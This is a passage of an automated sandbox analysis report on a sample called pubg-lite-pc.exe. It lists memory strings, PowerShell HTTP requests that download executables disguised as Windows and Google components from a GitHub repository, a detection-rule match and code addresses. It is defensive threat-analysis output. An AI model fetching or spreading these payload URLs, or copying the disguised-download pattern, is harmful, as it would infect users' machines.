Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/fluidicon.png
Source: powershell.exe, 00000016.00000002.65721729674.000002B40263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/gowgerrie/reb
Source: pubg-lite-pc.exe, 00000001.00000002.66211443988.0000000004670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/gowgerrie/reborn/raw/main/04/GoogleCrashHandler.exe
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/gowgerrie/reborn/raw/main/04/GoogleCrashHandler.exeCtrlEvtRemovingRemovingButtonT
Source: pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946978920.0000000004724000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946890921.000000000151E000.00000004.00000020.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64948133197.0000000004728000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66216182771.00000000046FF000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66211443988.0000000004670000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/gowgerrie/reborn/raw/main/04/GoogleCrashHandler64.exe
Source: pubg-lite-pc.exe, 00000001.00000003.64949071105.000000000470E000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64948702830.000000000470B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/gowgerrie/reborn/raw/main/04/GoogleCrashHandler64.exe#$
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/gowgerrie/reborn/raw/main/04/GoogleCrashHandler64.exe(NOT
Source: pubg-lite-pc.exe, 00000001.00000002.66216182771.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/gowgerrie/reborn/raw/main/04/GoogleCrashHandler64.exeO$e
Source: pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64948189735.000000000471F000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66204704157.0000000001514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/gowgerrie/reborn/raw/main/04/RuntimeBroker.exe
Source: powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/gowgerrie/reborn/raw/main/04/dllhost.exe
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/gowgerrie/reborn/raw/main/04/dllhost.exe&quot;
Source: powershell.exe, 00000016.00000002.65721729674.000002B40263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/gowgerrie/rebp
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/notifications/beta/shelf
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.community
Source: powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_as
Source: powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_details_ts-app_assets_mod
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_m
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_soft-nav_navigate_ts-8afe7373ae82.j
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/behaviors-b8d7fb708663.js
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/code-3d7b701fc6eb.css
Source: powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark-217d4f9c8e70.css
Source: powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_colorblind-5113d2be20b0.css
Source: powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_dimmed-0adfa28f0e68.css
Source: powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_high_contrast-1c8575b36644.css
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_tritanopia-2171ea0f078b.css
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/element-registry-f3ac80dedaa5.js
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/environment-d927ab3eb595.js
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/github-bbee8e363ed4.css
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/github-elements-146457231523.js
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/global-5a9114f3bf45.css
Source: powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light-5178aee0ee76.css
Source: powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light_colorblind-c96add742484.css
Source: powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light_high_contrast-290f92f5e867.css
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light_tritanopia-cdd88f146bf7.css
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/notifications-global-3cdb44ad6ab5.js
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/primer-494ab2110a2a.css
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/runtime-2a491a5717bb.js
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/sessions-09e8d6375c3f.js
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/site-4e265bd187dd.css
Source: powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_module
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_clipboard-copy-element_dist_index
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_inde
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_j
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-nod
Source: powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-e954e8c01c93.js
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_selector-observer_dist_index_esm_js-6503
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parse
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/favicons/favicon.png
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/favicons/favicon.svg
Source: powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/images/modules/open_graph/github-logo.png
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/images/modules/open_graph/github-mark.png
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/images/modules/open_graph/github-octocat.png
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/pinned-octocat.svg
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/static/fonts/github/alliance-1.woff2
Source: powershell.exe, 00000011.00000003.65347261407.0000024647AE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65721729674.000002B40263C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.65995098808.0000024B63162000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000003.65205693106.0000020D996DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
Source: pubg-lite-pc.exeString found in binary or memory: https://installeranalytics.com
Source: powershell.exe, 00000007.00000003.65114455500.0000020D82AB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.65277626545.0000020D915C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.65565812606.0000024656719000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65805223151.000002B411BBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65798855963.000002B411A77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://opensource.guide
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skills.github.com/
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stars.github.com
Source: powershell.exe, 00000016.00000002.65811395396.000002B411D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.65762973660.000002B402E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://user-images.githubusercontent.com/
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64950088610.0000000004710000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.advancedinstaller.com
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64950088610.0000000004710000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66224427029.0000000006770000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66204704157.0000000001514000.00000004.00000020.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000002.66216182771.00000000046FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64950088610.0000000004710000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.thawte.com/cps0/
Source: pubg-lite-pc.exe, 00000001.00000003.64942039930.0000000004770000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64943521396.00000000048AC000.00000004.00001000.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64950088610.0000000004710000.00000004.00000800.00020000.00000000.sdmp, pubg-lite-pc.exe, 00000001.00000003.64946291261.0000000004B15000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.thawte.com/repository0W
Source: unknownDNS traffic detected: queries for: github.com
Source: global trafficHTTP traffic detected: GET /gowgerrie/reborn/raw/main/04/dllhost.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /gowgerrie/reborn/raw/main/04/GoogleCrashHandler.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /gowgerrie/reborn/raw/main/04/GoogleCrashHandler64.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /gowgerrie/reborn/raw/main/04/RuntimeBroker.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /gowgerrie/reborn/raw/main/04/GoogleCrashHandler.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1151Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /gowgerrie/reborn/raw/main/04/dllhost.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1151Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /gowgerrie/reborn/raw/main/04/RuntimeBroker.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: github.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /gowgerrie/reborn/raw/main/04/GoogleCrashHandler64.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: github.comConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.11.20:49803 version: TLS 1.2
Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.11.20:49805 version: TLS 1.2
Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.11.20:49807 version: TLS 1.2
Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.11.20:49809 version: TLS 1.2
Source: pubg-lite-pc.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Process Memory Space: powershell.exe PID: 7608, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, score = file, reference = https://goo.gl/uAic1X, modified = 2022-07-11
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\bcfe14.msiJump to behavior
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009C71001_2_009C7100
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009E99701_2_009E9970
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009220101_2_00922010
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009725C01_2_009725C0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_0097A5301_2_0097A530
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009448F01_2_009448F0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009608601_2_00960860
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00A58A9B1_2_00A58A9B
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00A62AEE1_2_00A62AEE
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00996A201_2_00996A20
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009D6A501_2_009D6A50
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00A62C0E1_2_00A62C0E
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00940C601_2_00940C60
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00A4ED901_2_00A4ED90
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_0097ED601_2_0097ED60
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_0098EE501_2_0098EE50
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00952FD01_2_00952FD0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00950F701_2_00950F70
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00A610141_2_00A61014
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009513801_2_00951380
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009374D01_2_009374D0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009B7E801_2_009B7E80
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00941FB01_2_00941FB0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_0093BF101_2_0093BF10
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00A4BF011_2_00A4BF01
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_6D9A2CC51_2_6D9A2CC5
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_6D99A90D1_2_6D99A90D
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: String function: 009AF490 appears 120 times
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: String function: 00927330 appears 66 times
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: String function: 009AF2B0 appears 59 times
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: String function: 00935370 appears 34 times
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: String function: 00928E70 appears 56 times
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: String function: 00927C60 appears 31 times
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: String function: 00926C10 appears 209 times
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009F06F0 NtdllDefWindowProc_W,1_2_009F06F0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009560E0 NtdllDefWindowProc_W,1_2_009560E0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_0092E040 NtdllDefWindowProc_W,1_2_0092E040
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_0093A160 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,DeleteCriticalSection,1_2_0093A160
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00930510 NtdllDefWindowProc_W,1_2_00930510
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009946E0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,1_2_009946E0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_0095A890 NtdllDefWindowProc_W,1_2_0095A890
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00960860 NtdllDefWindowProc_W,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetWindowRect,SendMessageW,SendMessageW,SendMessageW,1_2_00960860
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_009589C5 NtdllDefWindowProc_W,1_2_009589C5
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00930AD0 NtdllDefWindowProc_W,1_2_00930AD0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_0096CBC0 GetWindowLongW,NtdllDefWindowProc_W,SendMessageW,1_2_0096CBC0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00974B40 NtdllDefWindowProc_W,1_2_00974B40
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00956CA0 GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,1_2_00956CA0
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_0093EE10 NtdllDefWindowProc_W,1_2_0093EE10
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00958FA9 NtdllDefWindowProc_W,1_2_00958FA9
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00979180 NtdllDefWindowProc_W,1_2_00979180
Source: C:\Users\user\Desktop\pubg-lite-pc.exeCode function: 1_2_00937170 IsWindow,GetWindowLongW,SetWindowLongW,NtdllDefWindowProc_W,1_2_00937170
